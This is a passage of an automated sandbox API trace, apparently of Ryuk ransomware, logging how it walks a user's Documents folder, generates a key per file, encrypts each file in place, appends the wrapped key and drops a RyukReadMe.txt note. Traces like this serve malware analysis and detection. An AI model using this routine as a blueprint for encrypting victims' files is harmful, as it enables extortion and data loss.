lpNumberOfBytesRead=0x29ac830*=0x150ae, lpOverlapped=0x0) returned 1 [0154.969] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0154.969] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x150ae, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x150b0) returned 1 [0154.970] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.970] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x150b0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x150b0, lpOverlapped=0x0) returned 1 [0154.970] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0154.970] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0154.970] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0154.970] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0154.970] CloseHandle (hObject=0x18c) returned 1 [0155.020] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.024] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.024] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.024] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.024] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.024] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\yRh6wHg57Q4t9F6.pdf", dwFileAttributes=0x80) returned 1 [0155.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\yRh6wHg57Q4t9F6.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\yrh6whg57q4t9f6.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.025] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=77508) returned 1 [0155.025] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=77508) returned 1 [0155.025] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x12da2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.025] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0155.025] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.025] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0155.025] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.026] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.026] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12ec4, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x12ec4, lpOverlapped=0x0) returned 1 [0155.027] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0155.027] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x12ec4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x12ed0) returned 1 [0155.027] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.027] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12ed0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x12ed0, lpOverlapped=0x0) returned 1 [0155.028] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0155.028] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.028] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.028] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0155.028] CloseHandle (hObject=0x18c) returned 1 [0155.042] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.046] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.046] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.047] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.047] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.047] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\zfQikw_.docx", dwFileAttributes=0x80) returned 1 [0155.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\zfQikw_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\zfqikw_.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.047] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=40236) returned 1 [0155.047] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=40236) returned 1 [0155.047] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x9c0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.047] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0155.048] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.048] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0155.048] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.048] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.048] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9d2c, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x9d2c, lpOverlapped=0x0) returned 1 [0155.049] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0155.049] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x9d2c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x9d30) returned 1 [0155.049] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.049] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9d30, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x9d30, lpOverlapped=0x0) returned 1 [0155.049] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0155.049] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.049] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0155.049] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0155.050] CloseHandle (hObject=0x18c) returned 1 [0155.074] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.078] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.078] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.079] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0155.079] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0155.079] SetLastError (dwErrCode=0x0) [0155.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.079] GetLastError () returned 0xb7 [0155.079] CloseHandle (hObject=0x188) returned 1 [0155.079] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.079] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.079] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1SIyvzLoK.docx", dwFileAttributes=0x80) returned 1 [0155.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1SIyvzLoK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siyvzlok.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.080] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=26652) returned 1 [0155.080] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=26652) returned 1 [0155.080] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x66fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.080] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.080] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.080] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.080] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.081] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.081] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x681c, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x681c, lpOverlapped=0x0) returned 1 [0155.081] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.081] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x681c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x6820) returned 1 [0155.081] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.081] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6820, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x6820, lpOverlapped=0x0) returned 1 [0155.081] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.081] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.081] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.082] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.082] CloseHandle (hObject=0x188) returned 1 [0155.097] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.101] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.101] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.101] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.101] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.101] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9gel6VEa.pptx", dwFileAttributes=0x80) returned 1 [0155.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9gel6VEa.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9gel6vea.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.102] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=22509) returned 1 [0155.102] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=22509) returned 1 [0155.102] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x56cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.102] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.103] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.103] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.103] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.103] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.103] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x57ed, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x57ed, lpOverlapped=0x0) returned 1 [0155.103] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.103] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x57ed, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x57f0) returned 1 [0155.103] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.104] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x57f0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x57f0, lpOverlapped=0x0) returned 1 [0155.104] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.104] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.104] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.104] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.104] CloseHandle (hObject=0x188) returned 1 [0155.131] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.135] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.135] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.135] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.135] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.136] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9nLUj6iR.pptx", dwFileAttributes=0x80) returned 1 [0155.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9nLUj6iR.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9nluj6ir.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.136] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=68303) returned 1 [0155.136] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=68303) returned 1 [0155.136] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x109ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.136] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.137] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.137] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.137] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.137] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.137] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10acf, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x10acf, lpOverlapped=0x0) returned 1 [0155.138] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.138] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x10acf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x10ad0) returned 1 [0155.138] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.138] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10ad0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x10ad0, lpOverlapped=0x0) returned 1 [0155.139] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.139] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.139] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.139] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.139] CloseHandle (hObject=0x188) returned 1 [0155.171] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.175] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.175] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.175] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.175] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.176] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aC86E.pdf", dwFileAttributes=0x80) returned 1 [0155.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aC86E.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ac86e.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.176] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=80526) returned 1 [0155.176] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=80526) returned 1 [0155.176] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x1396c, 